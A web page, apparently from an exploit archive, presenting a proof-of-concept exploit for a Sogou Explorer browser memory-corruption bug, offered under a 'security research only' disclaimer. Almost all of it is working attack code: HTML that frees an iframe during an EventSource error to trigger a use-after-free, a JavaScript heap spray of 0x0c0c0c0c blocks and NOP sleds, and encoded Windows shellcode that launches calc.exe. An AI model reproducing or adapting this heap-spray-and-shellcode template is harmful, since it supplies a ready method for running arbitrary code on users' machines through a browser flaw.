本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 

  1. <!--test2.html-->
  2. <html>
  3.   <body>
  4.     <script>
  5.         top.source = new EventSource("aaat.htm");
  6.         top.source.onerror =  function(err) { 
  7.           top.finish();
  8.         };
  9.     </script>
  10.   </body>
  11. </html>
  12.  
  13. ----------------
  14. <!--test.html-->
  15. <html>
  16.   <body>
  17.     <iframe id="test"  width="1" height="1">  </iframe>
  18.     <script type="text/javascript" src="shellcode.js"></script>
  19.     <script>
  20.       var  source;
  21.       shellcode();
  22.       function timer(){   
  23.         over();
  24.       }
  25.     function runTest(){
  26.       document.getElementById("test").src = "test2.html"; 
  27.     }
  28.     function finish(){
  29.       document.body.removeChild(document.getElementById("test"));
  30.       setTimeout(timer,1000);
  31.       //gc();
  32.     }
  33.      runTest();
  34.   </script>
  35. <A HREF="test.html"> go </A>
  36. </body>
  37. <html>
  38.  
  39. ----------------
  40. //shellcode.js
  41. function gc() {
  42.     if (typeof GCController !== "undefined")
  43.         GCController.collect();
  44.     else {
  45.         function gcRec(n) {
  46.             if (n < 1)
  47.                 return {};
  48.             var temp = {i: "ab" + i + (i / 100000)};
  49.             temp += "foo";
  50.             gcRec(n-1);
  51.         }
  52.         for (var i = 0; i < 1000; i++)
  53.             gcRec(10)
  54.     }
  55. }
  56.  
  57. function shellcode() {
  58. 	var shell = unescape("%u6060%u96e9%u0000%u5600%uc931%u8b64%u3071%u768B%u8b0C%u1c76%u468b%u8b08%u207e%u368b%u3966%u184f%uf275%uc35e%u8b60%u246c%u8b24%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u37e3%u8b49%u8b34%uee01%uff31%uc031%uacfc%uc084%u0a74%ucfc1%u010d%ue9c7%ufff1%uffff%u7c3b%u2824%ude75%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u89e8%u2444%u611c%uadc3%u5250%ua7e8%uffff%u89ff%u8107%u08c4%u0000%u8100%u04c7%u0000%u3900%u75ce%uc3e6%u19e8%u0000%u9800%u8afe%u7e0e%ue2d8%u8173%u00ec%u0000%u8900%ue8e5%uff5d%uffff%uc289%ue2eb%u8d5e%u047d%uf189%uc181%u0008%u0000%ub6e8%uffff%uebff%u5b0e%uc031%u5350%u55ff%u9004%u6161%uc031%ue8c3%uffed%uffff%u6163%u636c%u652e%u6578%u0000");
  59. 	var block = unescape("%u0c0c%u0c0c");
  60. 	var nops = unescape("%u9090%u9090%u9090");
  61. 	while (block.length <0x4000) block += block;
  62.       block=block.substring(0x90);
  63.       memory = new Array(1000);
  64.      var shellstr=new Array(3);
  65. 	   shellstr[0]=block;
  66.          shellstr[1]=nops;
  67.          shellstr[2]=shell;
  68.          var i;
  69. 	for (i=0;i<0x1000;i++) memory[i] =shellstr.join(""); 
  70. }
  71.  function over(){
  72.       var str=unescape("%u0c0c%u0c0c");
  73.       var str=unescape("%u0c0c%u0c0c");
  74.       strb="";
  75.     for(i=0;i<0x10000;++i){
  76. 			if(i<0x40) strb=strb+str;
  77. 			var sdiv=document.createElement("div");
  78. 			sdiv.innerText=strb;
  79. 			if(source.readyState==0x0c0c0c0c) {     
  80. 				//alert("over ok!  run calc.exe!");
  81. 				url=source.URL;
  82.        }
  83.     }
  84. } 
  85.  
  86. //http://forum.sysinternals.com/sogou-explorer-buffer-overflow-vulnerability_topic27040.html